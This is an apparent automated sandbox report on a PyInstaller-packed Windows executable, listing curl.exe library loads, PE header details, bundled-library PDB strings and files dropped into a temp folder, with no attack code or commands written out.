Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: file.exe

Static file information: File size 7319146 > 1048576

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: file.exe, 00000000.00000003.1753781951.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: file.exe, 00000000.00000003.1754116826.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: file.exe, 00000000.00000003.1750041127.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
Source:	Binary string: ucrtbase.pdb source: file.exe, 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmp, ucrtbase.dll.0.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: file.exe, 00000000.00000003.1750835118.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: _decimal.pyd.0.dr
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: file.exe, 00000000.00000003.1749617862.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: file.exe, 00000000.00000003.1752138241.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: file.exe, 00000000.00000003.1753536442.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1750835118.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: file.exe, 00000000.00000003.1754233802.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1753659236.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: file.exe, 00000000.00000003.1748229034.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: file.exe, 00000000.00000003.1750386943.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: file.exe, 00000000.00000003.1752374384.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1750386943.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: file.exe, 00000000.00000003.1751802736.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: file.exe, 00000000.00000003.1753385800.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1753887474.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1750280448.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1751234279.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: file.exe, 00000000.00000003.1748719469.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.0.dr
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: file.exe, 00000000.00000003.1749715082.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: _decimal.pyd.0.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1753536442.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: file.exe, 00000000.00000003.1751234279.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1754433845.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: file.exe, 00000000.00000003.1749386479.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-fibers-l1-1-0.pdb source: file.exe, 00000000.00000003.1749812781.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-fibers-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: file.exe, 00000000.00000003.1749927325.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1752254686.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1751102339.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: file.exe, 00000000.00000003.1752018194.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1753999667.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: file.exe, 00000000.00000003.1753238604.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1752374384.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1749509984.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: file.exe, 00000000.00000003.1748393847.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.0.dr
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1749715082.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: file.exe, 00000000.00000003.1751453983.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
Source:	Binary string: ucrtbase.pdbUGP source: file.exe, 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmp, ucrtbase.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: file.exe, 00000000.00000003.1749266271.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmp, _socket.pyd.0.dr
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1749927325.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1753238604.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1754233802.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1753385800.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: file.exe, 00000000.00000003.1754433845.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdbGCTL source: file.exe, 00000000.00000003.1750170866.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-fibers-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1749812781.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-fibers-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: file.exe, 00000000.00000003.1750280448.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: file.exe, 00000000.00000003.1759035583.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.0.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1752138241.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: file.exe, 00000000.00000003.1752018194.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: file.exe, 00000000.00000003.1750041127.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1751453983.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: file.exe, 00000000.00000003.1751102339.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.0.dr
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: file.exe, 00000000.00000003.1749509984.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: file.exe, 00000000.00000003.1752494159.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: file.exe, 00000000.00000003.1748229034.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: file.exe, 00000000.00000003.1750728421.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: file.exe, 00000000.00000003.1753887474.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1750492184.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1751690780.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1754336115.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: file.exe, 00000000.00000003.1751343265.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1749617862.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\python311.pdb source: file.exe, 00000001.00000002.3017300090.00007FFDFB4CC000.00000002.00000001.01000000.00000005.sdmp, python311.dll.0.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1750613362.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1753781951.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: file.exe, 00000000.00000003.1750728421.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: file.exe, 00000000.00000003.1750979635.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: file.exe, 00000000.00000003.1758420227.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3018996963.00007FFE1A453000.00000002.00000001.01000000.00000008.sdmp, select.pyd.0.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: file.exe, 00000000.00000003.1754551936.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: file.exe, 00000000.00000003.1751564708.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: file.exe, 00000000.00000003.1752254686.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: file.exe, 00000000.00000003.1751690780.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: file.exe, 00000000.00000003.1750170866.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1749386479.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: file.exe, 00000000.00000003.1753999667.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: file.exe, 00000000.00000003.1750613362.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1754551936.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1750979635.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: file.exe, 00000000.00000003.1750492184.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1751802736.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1754116826.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1751564708.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: file.exe, 00000000.00000003.1751343265.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1s 1 Nov 2022built on: Mon Jan 9 20:35:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.0.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: file.exe, 00000000.00000003.1753659236.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source:	Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.0.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1752494159.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: file.exe, 00000000.00000003.1754336115.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.0.dr

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr

Static PE information: 0xEBA28C46 [Sun Apr 10 18:28:22 2095 UTC]

Source: libcrypto-1_1.dll.0.dr	Static PE information: section name: .00cfg
Source: python311.dll.0.dr	Static PE information: section name: PyRuntim
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF17FDF0 pushfq ; ret	1_2_00007FFDFF17FDF1
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF17EA85 push rdi; ret	1_2_00007FFDFF17EA8B
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF17E569 push rdi; ret	1_2_00007FFDFF17E572
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF15126A push qword ptr [rdi+rbp-01h]; ret	1_2_00007FFDFF15126F
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF180311 push rdi; retn 0009h	1_2_00007FFDFF180316

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\file.exe

Process created: "C:\Users\user\Desktop\file.exe"

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
